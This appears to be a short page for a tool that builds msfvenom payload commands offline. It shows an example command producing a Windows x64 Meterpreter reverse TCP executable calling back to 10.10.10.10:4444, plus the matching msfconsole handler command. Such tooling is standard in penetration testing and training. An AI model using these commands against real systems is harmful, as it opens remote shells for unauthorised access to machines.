MSFVenom Builder

Build msfvenom payload commands from a form — payload, LHOST/LPORT, output format, encoder, iterations and bad characters — without memorizing flags. Generates the command text offline; nothing is executed.

msfvenom command
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe
Metasploit handler
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.10.10; set LPORT 4444; set ExitOnSession false; exploit -j"